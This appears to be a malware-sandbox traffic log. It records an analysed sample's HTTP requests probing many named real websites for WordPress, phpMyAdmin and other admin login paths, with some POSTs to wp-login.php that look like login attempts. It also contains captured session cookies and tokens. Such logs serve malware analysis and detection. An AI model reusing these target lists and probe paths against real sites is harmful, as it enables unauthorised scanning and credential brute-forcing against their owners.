Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: student.debritto.sch.idAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: avient.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.avient.com/wp-login.php
Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: esoft.academyAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://esoft.academy/wp-login.php
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin HTTP/1.1Host: www.2brospw.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: coralparkchristian.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: webstamp.caAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: www.2brospw.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: mydirectlender.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: hightideinc.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: jamiesonmullin.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: talentius.comAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=tsjerc0qbgetoevok3cpga3dv1User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://talentius.com/wp-login.php
Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: ce-logic.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: himontessori.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.perrisesd.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: rechagricola.com.brAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: www.linkan-group.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /en/admin.php HTTP/1.1Host: www.dstaq.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: mydirectlender.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /domain_profile.cfm?d=robinsonland.com HTTP/1.1Host: www.hugedomains.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: POST /wp-login.php HTTP/1.1Host: samson.peAccept: */*Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP+Cookie+checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://samson.pe/wp-login.phpContent-Length: 153Content-Type: application/x-www-form-urlencoded
Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: webstamp.caAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: hightideinc.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: edgewater.groupAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: grantstech.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: tiswheels.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: micro-design.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: POST /wp-login.php HTTP/1.1Host: engel-firm.comAccept: */*Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=jesjnggp6vjls65p7b8o9k2csbUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://engel-firm.com/wp-login.phpContent-Length: 158Content-Type: application/x-www-form-urlencoded
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: getquipu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: www.maxiv.lu.seAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: daisyokogyo.co.jpAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: www.ceuandalucia.esAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: www.integraledu.hrAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: www.harasduberry.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: www.bunasta.euAccept: */*Accept-Encoding: deflate, gzipCookie: CMSSESSID80f9fd3f=n9r0q6tfn1hneshgldk0v63lt6User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.bunasta.eu/administrator/
Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: www.harasduberry.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.harasduberry.com/wp-login.php
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.beachrecruitment.comAccept: */*Accept-Encoding: deflate, gzipCookie: OF=ggr72avlfjvqinhaol7mprbv57User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: unaj.edu.peAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: wonka.ccAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: eco-landeck.atAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: saudi-jamac.comAccept: */*Accept-Encoding: deflate, gzipCookie: dps_site_id=us-east-1User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: esoft.academyAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: avient.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: getquipu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://getquipu.com/
Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: ce-logic.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: gruporegiosafety.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: lumaruniformes.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: belongfbg.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: himontessori.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin/pages/ HTTP/1.1Host: ce-logic.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: POST /wp-login.php HTTP/1.1Host: mydirectlender.comAccept: */*Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://mydirectlender.com/wp-login.phpContent-Length: 137Content-Type: application/x-www-form-urlencoded
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.grantstech.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-admin HTTP/1.1Host: esoft.academyAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://esoft.academy/wp-login.php
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: beachrecruitment.comAccept: */*Accept-Encoding: deflate, gzipCookie: k8spersistent=4f36ac64dc73c26adfab9dad01788b38|11f187638643e13d7bd1963991fac52b; OF=9lma3oral9i39bi8q8vm70o157User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin HTTP/1.1Host: gatewaytoearlylearning.comAccept: */*Accept-Encoding: deflate, gzipCookie: PublishedSiteSession=eyJpdiI6InRCT085QUZJRjFua2xuMDJDT3JmbHc9PSIsInZhbHVlIjoiM3VwZ1JLbGxsM1JCcFR0U1RHbFZ4Wmk1OXNLN2ZLZ1BCa3Ezemo4Q2JnaFc1SnJ5OGt0ajUyRFpXc1ZlZkgyc002aEdTcWVIeldKVEdTT3hrZEhyQkxnOW45M3BxbHFoZFJTVlA2MHRkQUdud1RoM3hFc2R1TllxRE1DbWFQc0YiLCJtYWMiOiIzYzAwYjY4YWEyNjk2YTU4NDZjYmJlN2ZkOWEwNjQxMTY5YTVkYTg2NzA4MDhlNWNkZDQwMTRhYjMwNDhlN2IyIiwidGFnIjoiIn0%3D; publishedsite-xsrf=eyJpdiI6ImdiYkFhd05JR2E4T1V1QzU0RmJ0R1E9PSIsInZhbHVlIjoiZ1dZODltbm1WZkZRajlLRjFpVVV6VXBiZWtJdWlpWitLRXd6V09BMHMvcHh0Si9LRG81QjBGelNBRnlLTDZPcHdaMTZqV0hldnFXZ2pWTEZPOTlzRC9maFJOMk5WQmNhNjlabTVCTktsVzYrdWpJb000SmhCMU16Z0hUQ1o3RXkiLCJtYWMiOiJhMTMzN2U5N2RhYjc0MmQwNmQyYjhjZWYzZGQ2ZGZjNWJhZDM0OWFiODU1MTFmZjYyYjA4ZmI1ZmE0NDI5YTkzIiwidGFnIjoiIn0%3D; XSRF-TOKEN=eyJpdiI6IlJZU3NLbzFKdGUxMkI3Nm1jTjNaREE9PSIsInZhbHVlIjoidlEwV0taUnFVb1JOeXVHM2V6bXNaM3pEeWJSejdRUEE4R0cxcTYzZjVBYXYxVCs2elVaMW9MUFhESGVRa3RDQlY1R0lSVlA1bFJBWWJPRDNkaTBrRGl2amlDc0NoVFlpUjEvc25HeHFEaXc2N2ZrUk5DTmNteTFqZ3JWMnVaRDgiLCJtYWMiOiI2NTc0MTQyNjdkYzE4YWYwOTU3NDk3YzVjMTdlOWRkYmQ3MjMxMDBjNGUwMGVhMGRiN2U0Yzc5YTM5OTQ5YjI2IiwidGFnIjoiIn0%3DUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: gatewaytoearlylearning.comAccept: */*Accept-Encoding: deflate, gzipCookie: PublishedSiteSession=eyJpdiI6ImU4M05CeFdURWNUc0ZzQ2dqN1lFT3c9PSIsInZhbHVlIjoiaVhaYitWU0NGcUtJbFVXbHZDeTFZb3BvdXh5Y1dVajl2VDJEaXYrR29OVlJuWmVDUnB1SkZEVGN4NFVIak5CekRjdXdzVkd3R25zSWZXcVo5akRja0hsWDhNbzVCSGYwalk4QmxQWENlYzJQdDZLUGRIVm5QNTBhYiszNXkxTGkiLCJtYWMiOiJmOTVmY2Y3NzZjN2M0NTRkNGMxNDdmYWYxZjI1YzVlM2QxZmZlMDgwMmMzOGYzNjg4ZTE5YjNlZTMxNGI4MTQ2IiwidGFnIjoiIn0%3D; publishedsite-xsrf=eyJpdiI6InF3ZngrWVg5clBjRjFERUZvRVFCREE9PSIsInZhbHVlIjoiQjFQMzd6RTJFS0ovK2VYVVhaaUFWQjQxODRsWXA0RkZxUGZEWEhBZWFMK0tUTHNoZkVjQUJ5OE1BVHlPTThRbFlIaXNVL1JtRFllb2l3R0tLdURtZUkrVWIxL1AvR0hqdmRBWGNHSlFFWng1NzlTRmZ6QWFzZVFFRUdmalNieWgiLCJtYWMiOiJhYWJjOWRjYWY4NDFhNjhkMDY5MzM0YzQ1NTIxMTNhMGRjZDZkMmUxZTRkYzBlZGNmMDFhMjFhODk3Y2I3YjIzIiwidGFnIjoiIn0%3D; XSRF-TOKEN=eyJpdiI6Im5paEdlSlh3eDllRmZqM2VhVG5XbGc9PSIsInZhbHVlIjoiaTd1VWNrcEdXenVERFhjUEtQVFdzekd3a1ptYkZ3RE5lZ0NQdmtuYmE3U0pGZmVGNERmRWI2TzJWQnQvelArMUM5TEI1bHZSNnZHMGhuVkZseFd3am9ZSFNFNzQrbGRKSTNYeUV6VVJ2bUhHalFJY1lyWXRpK0lRQjdwZFlEdnUiLCJtYWMiOiI0NjM2ZjFlNjMzMDEyMDdhOGY0NTNmZTMyODdmMDhkZDk3NDBlZDMwMGQxNTI2Nzk2YTBiMDIxYzM0OWM0NGI2IiwidGFnIjoiIn0%3DUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: gccb.co.inAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: POST /wp-login.php?wpe-login=true HTTP/1.1Host: tiswheels.comAccept: */*Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=4b891e4bf86cbb4d9abf191d2f37b534User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://tiswheels.com/wp-login.phpContent-Length: 123Content-Type: application/x-www-form-urlencoded
Source: global trafficHTTP traffic detected: GET /login/?page=%2Fphpmyadmin%2F HTTP/1.1Host: my.calvary.qld.edu.auAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=m8r73sfk2fugohr6q21ktgilm1User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: rechagricola.com.brAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.rech.com/
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.maxiv.lu.seAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /Security/login?BackURL=%2Fadmin%2Fpages%2F HTTP/1.1Host: ce-logic.comAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=m4dctrurspuesp0b7frt4pped2User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: POST /wp-login.php HTTP/1.1Host: coralparkchristian.orgAccept: */*Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=nmvmuaeqvtv9ahtlqhgrbkp69nUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://coralparkchristian.org/wp-login.phpContent-Length: 165Content-Type: application/x-www-form-urlencoded
Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: my.calvary.qld.edu.auAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=0o33saodno7vmroa695q9i7ie9User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://login.microsoftonline.com/c8f4395e-fa4e-4196-adb9-ba2cd2ca09f0/saml2?SAMLRequest=fZJRb9owFIXf%2BRVV3uM4CaGJBUisrC0SA1TYHvYyXeybYsmxU9tpx79fiLd1mzTu4%2FE9n8498tRBo1q26PxJP%2BFLh86Pbvr53ijt2PA4izqrmQEnHdPQoGOes%2F3i05plhLLWGm%2B4UdE%2FtusucA6tl0YH22o5i7abj%2Bvtw2rzbZJCxbEu6FHc5hWnNE2xHFdlWRcgUBR5QUHkcBusX9C6njOLemw0CjTnOlxp50H7XqdZHqdpnE0OtGBFxfLya7Au%2B2OlBj%2FYT963jiWJMs9Sk0Zya5ypvdFKaiTcNAkv63FeFRjXMMZ4nFaTGMSxio%2BQcZFxoFVNk8vpWcDvfjbzQWoh9fP1Qo5hybHHw2EX77b7Q4AsfhV1Z7TrGrR7tK%2BS4%2Ben9Xvm5kw4qFewZ%2FKiBEHREeiGKAkPNtKe2mg%2BEKcXnQ0d2flVwjT5c%2FXd3LJNn3%2B13Bkl%2BXnQL3NvbAP%2B%2F2emJB0UKeJ6WGWddi1yWUsU0W%2FMQinzdmcRPM4ibzuMbpL5KGT5%2B6POfwA%3D&RelayState=%2Fadministrator%2F
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: daisyokogyo.co.jpAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /domain_profile.cfm?d=robinsonland.com HTTP/1.1Host: www.hugedomains.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp/wp-login.php HTTP/1.1Host: www.ceuandalucia.esAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: www.2brospw.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: www.avient.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: tradeavenida.comAccept: */*Accept-Encoding: deflate, gzipCookie: _cfuvid=Y9iVqDLjjy.4c42u423kB35hFI4xb1W3CLV4ZRxyw.Y-1700978381430-0-604800000User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: unaj.edu.peAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: engel-firm.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: mydirectlender.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: jamiesonmullin.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: knu.ac.inAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: samson.peAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: www.perrisesd.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: avient.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: edgewater.groupAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: webstamp.caAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /en/admin HTTP/1.1Host: www.dstaq.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: hightideinc.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: www.bunasta.euAccept: */*Accept-Encoding: deflate, gzipCookie: CMSSESSID80f9fd3f=n9r0q6tfn1hneshgldk0v63lt6User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.bunasta.eu/administrator/
Source: global trafficHTTP traffic detected: GET /pma HTTP/1.1Host: www.2brospw.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: tradeavenida.comAccept: */*Accept-Encoding: deflate, gzipCookie: _cfuvid=LBk7ek8JijCF4DUXGuPIp.xw2i6pFPf2iviA637QaLY-1700978381416-0-604800000User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin HTTP/1.1Host: esoft.academyAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.rechagricola.com.brAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: www.ceuandalucia.esAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: eco-landeck.atAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: gruporegiosafety.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: www.gatewaytoearlylearning.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: unaj.edu.peAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin HTTP/1.1Host: www.gatewaytoearlylearning.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
